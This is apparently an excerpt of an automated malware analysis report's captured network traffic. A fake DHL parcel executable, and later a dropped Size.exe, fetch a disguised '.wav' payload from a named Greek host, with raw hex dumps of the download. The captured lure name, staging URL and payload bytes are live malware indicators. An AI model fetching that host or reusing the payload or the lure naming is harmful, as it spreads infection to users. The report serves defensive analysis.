src="https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1" nonce="a8sPTFY01S1bvA7Euc8gkg"></script><script nonce="a8sPTFY01S1bvA7Euc8gkg">(function() {function signalGooglefcPresent() {if (!window.frames['googlefcPresent']) {if (document.body) {const iframe = document.createElement('iframe'); iframe.style = 'width: 0; height: 0; border: none; z-index: -1000; left: -1000px; top: -1000px;'; iframe.style.display = 'none'; iframe.name = 'googlefcPresent'; document.body.appendChild(iframe);} else {setTimeout(signalGooglefcPresent, 0);}}}signalGooglefcPresent();})();</script> <script> (function(){'use strict';fun
Nov 9, 2024 09:20:56.346744061 CET	212	IN	Data Raw: 63 74 69 6f 6e 20 61 61 28 61 29 7b 76 61 72 20 62 3d 30 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 61 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 21 31 2c 76 61 6c 75 65 3a 61 5b 62 2b 2b 5d 7d 3a 7b 64 6f Data Ascii: ction aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.p
Nov 9, 2024 09:20:56.346755028 CET	1236	IN	Data Raw: 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 61 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 Data Ascii: rototype)return a;a[b]=c.value;return a}; function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(
Nov 9, 2024 09:20:56.346887112 CET	212	IN	Data Raw: 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 62 5b 63 2d 61 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 72 65 74 75 72 6e 20 62 7d 0a 20 20 20 20 20 20 76 61 72 20 6e 61 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 Data Ascii: rguments.length;c++)b[c-a]=arguments[c];return b} var na="function"==typeof Object.assign?Object.assign:function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)Object.protot
Nov 9, 2024 09:20:56.346896887 CET	1236	IN	Data Raw: 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 64 2c 65 29 26 26 28 61 5b 65 5d 3d 64 5b 65 5d 29 7d 72 65 74 75 72 6e 20 61 7d 3b 68 61 28 22 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 Data Ascii: ype.hasOwnProperty.call(d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a\|\|na}); var p=this\|\|self;function q(a){return a};var t,u;a:{for(var oa=["CLOSURE_FLAGS"],v=p,x=0;x<oa.length;x++)if(v=v[oa[x]],null==v){u=null;br
Nov 9, 2024 09:20:56.346910000 CET	1236	IN	Data Raw: 6e 28 61 29 26 26 28 61 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 29 29 2c 49 28 61 2c 62 7c 31 29 29 7d 0a 20 20 20 20 20 20 76 61 72 20 48 3d 46 3f 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 Data Ascii: n(a)&&(a=Array.prototype.slice.call(a)),I(a,b\|1))} var H=F?function(a){return a[F]\|0}:function(a){return a.g\|0},J=F?function(a){return a[F]}:function(a){return a.g},I=F?function(a,b){a[F]=b}:function(a,b){void 0!==a.g?a.g=b:Object.define
Nov 9, 2024 09:20:56.347177029 CET	1236	IN	Data Raw: 75 6c 6c 21 3d 67 26 26 67 21 3d 3d 63 26 26 28 63 5b 66 2d 62 5d 3d 67 29 7d 61 2e 6c 65 6e 67 74 68 3d 64 2b 31 3b 61 5b 64 5d 3d 63 7d 3b 66 75 6e 63 74 69 6f 6e 20 41 61 28 61 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 61 29 7b 63 61 73 Data Ascii: ull!=g&&g!==c&&(c[f-b]=g)}a.length=d+1;a[d]=c};function Aa(a){switch(typeof a){case "number":return isFinite(a)?a:String(a);case "boolean":return a?1:0;case "object":if(a&&!Array.isArray(a)&&ta&&null!=a&&a instanceof Uint8Array){if(ua){for(var
Nov 9, 2024 09:20:56.347332001 CET	1236	IN	Data Raw: 69 6f 6e 20 44 61 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 6e 75 6c 6c 21 3d 61 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 61 3d 65 26 26 30 3d 3d 61 2e 6c 65 6e 67 74 68 26 26 48 28 61 29 26 31 3f 76 6f 69 64 20 Data Ascii: ion Da(a,b,c,d,e,f){if(null!=a){if(Array.isArray(a))a=e&&0==a.length&&H(a)&1?void 0:f&&H(a)&2?a:Ea(a,b,c,void 0!==d,e,f);else if(N(a)){var g={},h;for(h in a)Object.prototype.hasOwnProperty.call(a,h)&&(g[h]=Da(a[h],b,c,d,e,f));a=g}else a=b(a,d)
Nov 9, 2024 09:20:56.347342968 CET	848	IN	Data Raw: 2d 31 5d 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 64 29 72 65 74 75 72 6e 3b 66 3d 61 5b 66 2b 28 28 62 3e 3e 39 26 31 29 2d 31 29 5d 3d 7b 7d 3b 65 7c 3d 32 35 36 7d 66 5b 63 5d 3d 64 3b 65 26 3d 2d 31 30 32 35 3b 65 21 3d 3d 62 26 26 49 28 Data Ascii: -1];else{if(null==d)return;f=a[f+((b>>9&1)-1)]={};e\|=256}f[c]=d;e&=-1025;e!==b&&I(a,e)}else a[c+((b>>9&1)-1)]=d,b&256&&(d=a[a.length-1],c in d&&delete d[c]),b&1024&&I(a,b&-1025)} function La(a,b){var c=Ma;var d=void 0===d?!1:d;var e=a.h;
Nov 9, 2024 09:20:56.347354889 CET	1236	IN	Data Raw: 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 2c 21 31 29 3b 72 65 74 75 72 6e 20 50 61 28 74 68 69 73 2c 61 2c 21 30 29 7d 3b 54 2e 70 72 6f 74 6f 74 79 70 65 2e 73 3d 4d 3b 54 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 Data Ascii: ,void 0,void 0,!1,!1);return Pa(this,a,!0)};T.prototype.s=M;T.prototype.toString=function(){return Pa(this,this.h,!1).toString()}; function Pa(a,b,c){var d=a.constructor.v,e=L(J(c?a.h:b)),f=!1;if(d){if(!c){b=Array.prototype.slice.call(b)
Nov 9, 2024 09:20:56.351689100 CET	1236	IN	Data Raw: 29 3b 76 61 72 20 55 3b 66 75 6e 63 74 69 6f 6e 20 56 28 61 29 7b 74 68 69 73 2e 67 3d 61 7d 56 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 Data Ascii: );var U;function V(a){this.g=a}V.prototype.toString=function(){return this.g+""};var Ta={};function Ua(){return Math.floor(2147483648Math.random()).toString(36)+Math.abs(Math.floor(2147483648Math.random())^Date.now()).toString(36)};function

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.78.221.73	443	6152	C:\Users\user\Desktop\DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 08:20:22 UTC	80	OUT	GET /slim/Xisav.wav HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
2024-11-09 08:20:23 UTC	301	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 08:20:22 GMT Server: Apache Last-Modified: Fri, 08 Nov 2024 05:21:25 GMT Accept-Ranges: bytes Content-Length: 1142280 Cache-Control: max-age=1209600 Expires: Sat, 23 Nov 2024 08:20:22 GMT Vary: User-Agent Connection: close Content-Type: audio/x-wav
2024-11-09 08:20:23 UTC	7891	IN	Data Raw: 2b 11 8a 29 d9 a7 d4 6d 40 4c 66 c1 85 43 52 02 5e 5a cc 68 d2 81 28 f8 44 6a fc 45 0f 24 82 cf 4a 8d d5 f8 24 a9 44 ea 64 b8 32 5b ba a4 b8 2b 8b 85 4d 71 76 d1 64 e5 cb 40 66 a2 cd 1c 37 5a 9b 0d fc 78 d5 52 b8 fd 62 f9 28 7b 4d 58 e6 ff 02 12 d1 85 ab d6 62 ab 28 d0 33 52 9a c8 a5 6b a3 f7 bc d5 ab 6d 5b 02 ec 2c 97 3b c2 2a 04 33 29 f7 05 b8 0d 7b b6 82 f4 4e 5c f9 0b a9 1c 30 f7 5f 38 43 a5 05 92 a7 d4 d9 74 b1 98 88 70 c8 79 c7 77 dd e8 13 a9 5f 1f 81 74 eb 78 57 7f 5e 8d 49 75 de 75 d3 d7 05 ae ae 69 48 b1 80 46 44 00 00 e9 4e ba 0e c3 1f 33 b4 ff f6 cc 1c 2a eb b5 67 c5 59 05 b0 aa 34 b8 45 b9 2e ba 4f 0c 54 45 17 50 7c 22 04 e4 6b 3d 33 e5 f2 56 40 58 53 fb 07 22 fd a2 d2 9a 6f 73 c3 dc f9 58 0f 3d 95 66 13 6b b2 c0 f3 46 45 ec 60 9c 27 23 5e ec Data Ascii: +)m@LfCR^Zh(DjE$J$Dd2[+Mqvd@f7ZxRb({MXb(3Rkm[,;3){N\0_8Ctpyw_txW^IuuiHFDN3gY4E.OTEP\|"k=3V@XS"osX=fkFE`'#^
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: bc d1 81 3c 77 37 4a 77 8f dd 6f 87 a7 7e 0f 8f c1 3d 8d 4b 71 80 b7 34 7e eb e4 5a 8a 98 ab 60 79 0e 64 ae 58 d9 df be 56 83 da 5d 72 32 21 4e 84 fe 4d bb 2e 25 3e e6 dd 11 e7 8d 6a 37 87 17 a0 39 18 85 01 bf 89 bc fd 25 30 30 19 4b fd 96 32 50 87 7b 1a 58 8b 19 c1 60 ba 89 11 b3 e9 67 32 dd 00 fd 34 ee 1f 44 5c a6 5f e0 7c ab 02 1a b2 4f fd ce d4 20 e6 94 8f 48 64 70 12 e4 3d 46 b4 bb 45 75 68 b1 37 56 e9 7e 78 42 40 4e 9f 75 18 59 f7 04 c3 d3 00 31 82 b8 b6 1e 1c d5 ac fc 7c df a4 6f 5a e9 13 f4 4d 5d a3 95 8d 10 08 e1 fb 33 f3 df 72 5f 58 32 1b 16 b2 ce 6b 60 3d ec f3 54 6a e1 94 ca ee 5e 4b 62 e8 d0 5e 70 f3 bc 6e c1 26 4c 55 44 be 6a 4e 2d 0b f3 ba ab da 1e 4d f4 ba 29 97 98 f4 63 6f c9 00 e9 c2 30 36 cc 69 6e 13 7d ee 5c 3f 7d 39 19 fb d8 d7 87 e2 Data Ascii: <w7Jwo~=Kq4~Z`ydXV]r2!NM.%>j79%00K2P{X`g24D\_\|O Hdp=FEuh7V~xB@NuY1\|oZM]3r_X2k`=Tj^Kb^pn&LUDjN-M)co06in}\?}9
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: 42 9a c9 12 13 79 dd 59 24 00 2f ea 3b f1 1e bd 1c 5d 68 c5 c9 f0 04 40 98 95 02 ce 68 d7 67 a1 f6 aa c4 69 73 a1 27 90 28 bc 7d 57 a2 2f bd bd df aa ea b3 ac 48 a1 24 cf 5d 24 ea 2f 74 51 47 83 79 e8 f0 af 41 cb c9 49 a1 ef c4 53 47 ca fc 57 f5 f3 cb 78 12 63 88 4c 5a 17 e9 3f aa de 69 13 11 4c dc 54 70 9a e2 6a 1e 30 da 53 cf 1a 95 5e 80 70 b7 de 17 89 28 d0 b5 07 22 f9 f9 f0 1e 55 89 34 7c be 84 af 56 8f 19 82 47 ce 48 4e c6 01 dd 14 e7 33 2a d6 20 66 ed 6f bc 9b 5f 28 7b ea d2 4b ca 4e 1d 55 a6 84 48 d6 c5 e5 36 5b b7 3a 6a 6e 42 d9 b6 21 93 d0 c5 df f8 6a e5 2e 6c 2a 4f f0 73 ed 46 c2 8f 58 60 02 a5 28 e8 ed 4d 5a 14 00 43 6a cf 17 bb 9e 5b 3e 84 b8 fb 02 60 ac e3 67 bf 4f d8 ac de c0 fe de c1 9f b7 00 c8 bc 68 91 f1 d3 fe 3c 34 ec c9 c5 1a 25 37 85 Data Ascii: ByY$/;]h@hgis'(}W/H$]$/tQGyAISGWxcLZ?iLTpj0S^p("U4\|VGHN3* fo_({KNUH6[:jnB!j.l*OsFX`(MZCj[>`gOh<4%7
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: a0 bf 57 6e f9 20 5d 62 2b 44 07 3b 48 6c ee cc 0d c2 aa 01 01 a3 12 3c 8a 98 ba 2c cc b2 e0 03 c4 4b 15 2f d2 bc 02 28 9a 6f 21 63 1a 0e 75 ac bb c1 f8 2e e9 71 aa 0b 19 ef 74 b6 87 c5 70 da 1a 4f d8 c0 2b 9a ba 38 9b 1f 3f 2f 4b ec 05 3f 63 2a aa c4 cd 54 79 b5 fc bd 05 f1 34 58 0a c5 6c e2 c9 7b 7e 59 e7 59 56 95 f0 be 23 98 2b 08 a1 cb e1 04 83 01 fb 27 d1 00 17 81 2b 09 19 d7 b9 34 6c 47 6a a3 bb 2a 97 5c 23 da 69 62 ee 60 9c 0b 8f 3e e1 e2 01 de f8 47 63 40 35 d0 2a 29 7e 13 b7 b4 bc f6 49 4e a2 f9 6c bb 80 cb 0a e0 d5 11 e2 74 63 af b8 8c 72 d7 76 3c c0 5f 2b 97 49 4f 76 3a ad f8 a7 da a5 c2 e0 00 be 6b c1 93 64 da c5 57 f3 14 c2 92 21 e5 53 42 e3 de 7d ca 35 4c b0 49 38 6a 9f 88 23 10 32 3c 2a be 78 66 47 49 4c db 67 d5 2a 10 64 7d 09 9f 39 27 1d Data Ascii: Wn ]b+D;Hl<,K/(o!cu.qtpO+8?/K?cTy4Xl{~YYV#+'+4lGj\#ib`>Gc@5)~INltcrv<_+IOv:kdW!SB}5LI8j#2<xfGILg*d}9'
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: 5b 40 b2 2b 06 6f 64 eb 62 00 43 5e 34 f7 a5 be 22 15 95 93 c3 e7 4c 2a 34 f0 f0 bb 20 f8 0a d5 9e 0c 4d f0 c0 ae 7f 84 7a 76 2a 0d f6 88 5c e8 bf 59 45 14 99 4a 14 dd 88 05 e3 c5 32 e8 b3 b4 32 b8 13 6e 41 06 b0 61 a3 6f 5f c8 cd 4b 56 9a 41 6b 4d 64 ee 78 3f ef 4c 3d c9 3f df c9 c9 97 fd 54 51 1c b7 60 b7 bf b7 fd e4 51 66 3a 46 94 98 5a 3d 67 04 58 8a c0 49 21 c7 fb d1 81 64 04 e9 89 4b cb 05 0c ad 85 7b 1c 93 05 4e 7f 73 71 08 c1 73 d1 84 b9 f0 07 63 ac fb ff 95 04 3a 75 87 3d 4c 5d 98 33 44 aa 12 5f 55 f5 cf aa 44 e9 92 6b 16 3f a0 9a b9 99 c2 39 bb c7 f6 79 02 aa af cb 6d 0a 91 f8 f1 be fe a1 c7 f0 9e 23 d5 df 29 a8 e3 97 e3 cc f8 60 6c e8 87 0a 76 3b 04 a0 33 b0 34 99 27 e7 69 43 ca b7 cc 10 6b e3 8f 4a 91 7b b2 3d cd 92 86 ba 4f ef cb aa 33 57 96 Data Ascii: [@+odbC^4"L4 Mzv\YEJ22nAao_KVAkMdx?L=?TQ`Qf:FZ=gXI!dK{Nsqsc:u=L]3D_UDk?9ym#)`lv;34'iCkJ{=O3W
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: 54 b8 da 2d 6e db 4a 63 e2 ad 27 7d d2 4c 01 22 d9 ea b2 7e 64 c4 1e 8d 80 92 bc e4 30 2f 2e ae 7c 14 b6 c5 d8 5d 50 43 5d 9e 02 93 b8 4a 3b 1d 60 10 ed 3a 35 ff 05 0d 75 f8 44 e7 cc 96 57 ea 7a aa 77 41 e4 2b 7e a5 f4 47 6e 07 f5 1a e2 f4 45 27 cf 41 29 29 a6 3f 3c 42 bb b2 1a 23 6c a0 e3 1f cf 9a 74 0e 79 38 54 4e fa 30 2d 98 0f 5b 3d 3c b7 2b 35 17 88 b0 77 b3 69 05 5a 1c 9d 17 ff b8 f6 9e c7 19 04 4d f8 36 b5 d2 b9 47 b7 dc 42 80 06 f0 c2 8b de 20 14 2c 1d 7a 1b 28 0f c7 8f 4c 78 58 bc 48 8c 12 79 3c e9 80 20 b1 a7 c6 d9 d9 22 e1 62 2d 2c 18 2c fd 43 44 3b e0 2f a6 1e 65 40 d0 49 f5 d4 e3 3c 90 ca 08 4d de dc dc 39 87 af b1 78 0c 67 96 f3 cc 76 ec 39 e0 b6 ca cd 8e eb a5 12 fb 73 9e 81 8d 4b 0f d1 fb ca 13 6c 7f 80 3d 56 75 09 3b 30 3a 1e bd 27 46 a7 Data Ascii: T-nJc'}L"~d0/.\|]PC]J;`:5uDWzwA+~GnE'A))?<B#lty8TN0-[=<+5wiZM6GB ,z(LxXHy< "b-,,CD;/e@I<M9xgv9sKl=Vu;0:'F
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: e1 d3 2b 27 c3 af c4 3a dd 4f 23 6a 8a 71 ef c9 64 3b 22 0b b9 c7 80 c4 e7 20 87 e6 f2 3b da 3e 2b 1e 77 1e e7 e2 0e 58 82 da 29 90 73 f2 81 ac 31 b3 87 97 99 b6 2b 8f 3a 2a fa da e7 ca f5 94 3d e6 97 f7 40 b6 42 ba 25 48 ab 22 78 b1 5e fb 2f a9 c6 40 e9 b4 61 f7 76 ce db f8 0c da b6 4b 7a 57 d6 53 3c f4 3d be 4c a0 31 dc 98 dd 01 97 63 8c a2 89 28 15 00 d2 08 b3 c2 e2 74 c1 0c 7b 7e 5a 9b ef b8 e3 9a 49 33 a8 c1 dc 3a eb 8c 97 6a ab 5f 48 d0 9f ae 86 61 f2 78 ce dd 07 b6 bc db 6a bb 61 5f da 6e 57 9a db 38 5d a8 ff 56 4d f7 4c 62 17 98 fb 97 10 8b a6 fd 3a b7 fc c6 4f 5b 53 8d ad 82 d9 0f 16 1c 25 29 7e 10 38 87 a8 15 48 98 29 4a 6d 1a ca a9 44 02 f4 b0 3f 27 75 85 db de a2 cf 8e 31 73 95 a7 ef 26 2b 61 f9 5b 0b d2 85 ec cd 90 e5 6d 54 3c 75 d6 27 ba ff Data Ascii: +':O#jqd;" ;>+wX)s1+:*=@B%H"x^/@avKzWS<=L1c(t{~ZI3:j_Haxja_nW8]VMLb:O[S%)~8H)JmD?'u1s&+a[mT<u'
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: dd da ba 2c d5 21 11 4f cc cd ba 4e 40 e6 56 3f f6 4e 56 4f 99 0e 89 39 89 65 b0 5b 59 08 2e 18 ca bc 57 f5 ad c0 de 46 58 e2 f6 4a 18 19 d1 83 fc b8 e0 04 ae 03 73 6e df 72 56 f1 76 55 59 e8 07 4b b4 cd 3b bc a6 88 23 ae 0a ff 67 2f 5b e0 9f 9b 7f 87 ca e4 a6 c5 60 dc 66 76 d6 97 32 b9 84 fe 99 a5 a5 b1 af fb 6b 4d 6e 87 72 81 7f 92 7f dc a1 28 d9 09 34 21 c3 32 79 54 38 19 31 40 74 79 87 d4 f0 66 a7 3a 8b 01 ab 83 e9 78 66 28 6a 92 d4 25 af c2 99 84 52 0b be 22 8a bb a7 0c f2 ae bb 36 bd ea 15 b3 6c 76 66 f3 55 96 93 cb 2d 03 84 fe ad db fa b6 0b 3b f8 56 03 b7 0d 3a 26 10 88 8a 12 5d 86 ba 30 b1 44 a6 ed 84 74 29 31 7a 58 d4 31 0e c0 d7 62 fc 29 29 b9 52 ee a2 ef 97 e6 03 91 21 72 bc 32 32 87 d4 d2 61 6e 8b 03 7a ec 40 24 56 0b a8 50 6a 45 de de da b7 Data Ascii: ,!ON@V?NVO9e[Y.WFXJsnrVvUYK;#g/[`fv2kMnr(4!2yT81@tyf:xf(j%R"6lvfU-;V:&]0Dt)1zX1b))R!r22anz@$VPjE
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: 2b fd 38 26 b3 5c da 58 30 72 7b d3 0d fd 97 1f a7 14 9e 27 2f c5 72 6f e6 99 f5 31 7e b6 29 88 8f 34 36 6b ae 5f 17 78 50 4f 6b 6a a8 97 bd 17 e7 a3 56 ba d5 83 5c 17 57 11 61 dc ad fd 1b b8 63 c4 69 ba d2 12 d8 68 c9 5c 02 a1 3f bc 11 18 a1 61 90 69 e2 48 5a fe 5d a6 be d3 c6 55 d2 1d 59 0e 28 91 5e 1a fa 49 a0 b5 e2 35 b3 32 05 e4 b0 dd ae 0a 1d ca 4e c0 dc b0 a6 78 d5 02 0f 95 c5 92 85 7a 17 e8 75 3a 0b 26 30 15 cf 92 88 c0 8b 12 53 50 62 ef dc 38 1f e1 c3 98 62 65 6b bf d2 b5 38 8f a3 0b da e4 2a 7e e5 3d 68 b3 ad 3a 11 f2 98 b9 dc 95 4e e0 40 29 44 e5 7b d7 5d 72 f9 d3 1e 4c c1 0e 8c 23 2e 22 67 23 31 dc 92 4b fc ff 84 9e 71 dd b5 9e b2 5a 17 86 f1 dc df e2 bf 00 90 05 ff 0b 53 45 3d 3f bd f2 84 db 49 fa 86 91 09 93 23 0d d8 8f 25 fe c8 85 0f 2e dd Data Ascii: +8&\X0r{'/ro1~)46k_xPOkjV\Wacih\?aiHZ]UY(^I52Nxzu:&0SPb8bek8*~=h:N@)D{]rL#."g#1KqZSE=?I#%.
2024-11-09 08:20:23 UTC	8000	IN	Data Raw: 6d 37 14 0f 84 4e 11 e4 c8 60 a8 5f 12 e6 fa a0 a8 60 69 84 97 b6 ae 9f d0 e5 67 4b 57 64 9e aa b7 bc 5f c5 fe c0 3b fc fd b2 a4 14 83 66 fa d1 06 79 a5 f7 05 e3 d0 6e f8 db cf 4a b8 91 aa 27 a7 9c ff ab d5 37 58 64 33 93 3c 12 60 bd b4 83 4b 3b bc 5f b5 0b aa ed f0 d1 c7 d7 5a c0 f3 49 6f f3 8e 9d 31 94 58 c0 18 9c 65 b4 25 36 83 b1 a5 b6 c2 a3 b5 a9 b7 57 91 43 a4 a8 9a 72 33 d7 58 90 11 c4 15 e7 29 57 00 5e 7c 1e d1 cc 3c 36 77 f7 24 88 ed 55 20 7b d7 64 dd aa 53 45 c1 88 df 1f 25 9f 49 27 a4 8e 19 b8 85 96 02 42 a8 40 ae e1 6b 97 62 8d be f3 8b 1d f8 e2 7f 44 71 68 e9 3a c4 91 72 c2 cc c4 97 d3 43 90 16 b4 30 5e f0 b4 e6 6b 10 51 09 97 9e 8a 5a 88 63 07 35 81 05 2f 2e 69 c7 9f 33 51 04 3a 50 d1 a9 cc 71 41 26 5a fc 7b 05 e9 85 ce 66 29 23 23 0d 61 49 Data Ascii: m7N`_`igKWd_;fynJ'7Xd3<`K;_ZIo1Xe%6WCr3X)W^\|<6w$U {dSE%I'B@kbDqh:rC0^kQZc5/.i3Q:PqA&Z{f)##aI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49713	185.78.221.73	443	6472	C:\Users\user\AppData\Roaming\Size.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-09 08:20:42 UTC	80	OUT	GET /slim/Xisav.wav HTTP/1.1 Host: www.oleonidas.gr Connection: Keep-Alive
2024-11-09 08:20:42 UTC	301	IN	HTTP/1.1 200 OK Date: Sat, 09 Nov 2024 08:20:42 GMT Server: Apache Last-Modified: Fri, 08 Nov 2024 05:21:25 GMT Accept-Ranges: bytes Content-Length: 1142280 Cache-Control: max-age=1209600 Expires: Sat, 23 Nov 2024 08:20:42 GMT Vary: User-Agent Connection: close Content-Type: audio/x-wav
2024-11-09 08:20:42 UTC	7891	IN	Data Raw: 2b 11 8a 29 d9 a7 d4 6d 40 4c 66 c1 85 43 52 02 5e 5a cc 68 d2 81 28 f8 44 6a fc 45 0f 24 82 cf 4a 8d d5 f8 24 a9 44 ea 64 b8 32 5b ba a4 b8 2b 8b 85 4d 71 76 d1 64 e5 cb 40 66 a2 cd 1c 37 5a 9b 0d fc 78 d5 52 b8 fd 62 f9 28 7b 4d 58 e6 ff 02 12 d1 85 ab d6 62 ab 28 d0 33 52 9a c8 a5 6b a3 f7 bc d5 ab 6d 5b 02 ec 2c 97 3b c2 2a 04 33 29 f7 05 b8 0d 7b b6 82 f4 4e 5c f9 0b a9 1c 30 f7 5f 38 43 a5 05 92 a7 d4 d9 74 b1 98 88 70 c8 79 c7 77 dd e8 13 a9 5f 1f 81 74 eb 78 57 7f 5e 8d 49 75 de 75 d3 d7 05 ae ae 69 48 b1 80 46 44 00 00 e9 4e ba 0e c3 1f 33 b4 ff f6 cc 1c 2a eb b5 67 c5 59 05 b0 aa 34 b8 45 b9 2e ba 4f 0c 54 45 17 50 7c 22 04 e4 6b 3d 33 e5 f2 56 40 58 53 fb 07 22 fd a2 d2 9a 6f 73 c3 dc f9 58 0f 3d 95 66 13 6b b2 c0 f3 46 45 ec 60 9c 27 23 5e ec Data Ascii: +)m@LfCR^Zh(DjE$J$Dd2[+Mqvd@f7ZxRb({MXb(3Rkm[,;3){N\0_8Ctpyw_txW^IuuiHFDN3gY4E.OTEP\|"k=3V@XS"osX=fkFE`'#^
2024-11-09 08:20:42 UTC	8000	IN	Data Raw: bc d1 81 3c 77 37 4a 77 8f dd 6f 87 a7 7e 0f 8f c1 3d 8d 4b 71 80 b7 34 7e eb e4 5a 8a 98 ab 60 79 0e 64 ae 58 d9 df be 56 83 da 5d 72 32 21 4e 84 fe 4d bb 2e 25 3e e6 dd 11 e7 8d 6a 37 87 17 a0 39 18 85 01 bf 89 bc fd 25 30 30 19 4b fd 96 32 50 87 7b 1a 58 8b 19 c1 60 ba 89 11 b3 e9 67 32 dd 00 fd 34 ee 1f 44 5c a6 5f e0 7c ab 02 1a b2 4f fd ce d4 20 e6 94 8f 48 64 70 12 e4 3d 46 b4 bb 45 75 68 b1 37 56 e9 7e 78 42 40 4e 9f 75 18 59 f7 04 c3 d3 00 31 82 b8 b6 1e 1c d5 ac fc 7c df a4 6f 5a e9 13 f4 4d 5d a3 95 8d 10 08 e1 fb 33 f3 df 72 5f 58 32 1b 16 b2 ce 6b 60 3d ec f3 54 6a e1 94 ca ee 5e 4b 62 e8 d0 5e 70 f3 bc 6e c1 26 4c 55 44 be 6a 4e 2d 0b f3 ba ab da 1e 4d f4 ba 29 97 98 f4 63 6f c9 00 e9 c2 30 36 cc 69 6e 13 7d ee 5c 3f 7d 39 19 fb d8 d7 87 e2 Data Ascii: <w7Jwo~=Kq4~Z`ydXV]r2!NM.%>j79%00K2P{X`g24D\_\|O Hdp=FEuh7V~xB@NuY1\|oZM]3r_X2k`=Tj^Kb^pn&LUDjN-M)co06in}\?}9
2024-11-09 08:20:42 UTC	8000	IN	Data Raw: 42 9a c9 12 13 79 dd 59 24 00 2f ea 3b f1 1e bd 1c 5d 68 c5 c9 f0 04 40 98 95 02 ce 68 d7 67 a1 f6 aa c4 69 73 a1 27 90 28 bc 7d 57 a2 2f bd bd df aa ea b3 ac 48 a1 24 cf 5d 24 ea 2f 74 51 47 83 79 e8 f0 af 41 cb c9 49 a1 ef c4 53 47 ca fc 57 f5 f3 cb 78 12 63 88 4c 5a 17 e9 3f aa de 69 13 11 4c dc 54 70 9a e2 6a 1e 30 da 53 cf 1a 95 5e 80 70 b7 de 17 89 28 d0 b5 07 22 f9 f9 f0 1e 55 89 34 7c be 84 af 56 8f 19 82 47 ce 48 4e c6 01 dd 14 e7 33 2a d6 20 66 ed 6f bc 9b 5f 28 7b ea d2 4b ca 4e 1d 55 a6 84 48 d6 c5 e5 36 5b b7 3a 6a 6e 42 d9 b6 21 93 d0 c5 df f8 6a e5 2e 6c 2a 4f f0 73 ed 46 c2 8f 58 60 02 a5 28 e8 ed 4d 5a 14 00 43 6a cf 17 bb 9e 5b 3e 84 b8 fb 02 60 ac e3 67 bf 4f d8 ac de c0 fe de c1 9f b7 00 c8 bc 68 91 f1 d3 fe 3c 34 ec c9 c5 1a 25 37 85 Data Ascii: ByY$/;]h@hgis'(}W/H$]$/tQGyAISGWxcLZ?iLTpj0S^p("U4\|VGHN3* fo_({KNUH6[:jnB!j.l*OsFX`(MZCj[>`gOh<4%7
